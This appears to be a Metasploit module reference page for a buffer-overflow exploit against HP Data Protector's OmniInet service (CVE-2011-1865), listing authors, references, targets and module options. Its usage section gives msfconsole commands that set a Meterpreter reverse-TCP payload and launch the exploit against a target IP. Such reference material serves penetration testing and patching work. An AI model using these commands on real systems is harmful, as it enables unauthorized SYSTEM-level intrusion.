HP OmniInet.exe Opcode 20 Buffer Overflow
This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is written to the stack without proper bounds checking, which results in arbitrary code execution under the context of SYSTEM. This module is also built to work against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.
Exploit Rank
- Good
Exploit Authors
- Oren Isacson
- muts
- dookie
- sinn3r < sinn3r [at] metasploit.com >
- corelanc0d3r < peter.ve [at] corelan.be >
Vulnerability References
- CVE-2011-1865
- OSVDB-73571
- EDB-17468
- http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
Exploit Targets
- 0 - HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008 (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/misc/agentxpp_receive_agentx
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/asus_dpcproxy_overflow
- exploit/windows/misc/avidphoneticindexer
- exploit/windows/misc/bakbone_netvault_heap
- exploit/windows/misc/bcaaa_bof
- exploit/windows/misc/bigant_server
- exploit/windows/misc/bigant_server_250
- exploit/windows/misc/bigant_server_usv
- exploit/windows/misc/bomberclone_overflow
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/misc/hp_omniinet_4
msf exploit(hp_omniinet_4) > show payloads
msf exploit(hp_omniinet_4) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(hp_omniinet_4) > set LHOST [MY IP ADDRESS]
msf exploit(hp_omniinet_4) > set RHOST [TARGET IP]
msf exploit(hp_omniinet_4) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| RHOST | The target address |
| RPORT | The target port (default: 5555) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
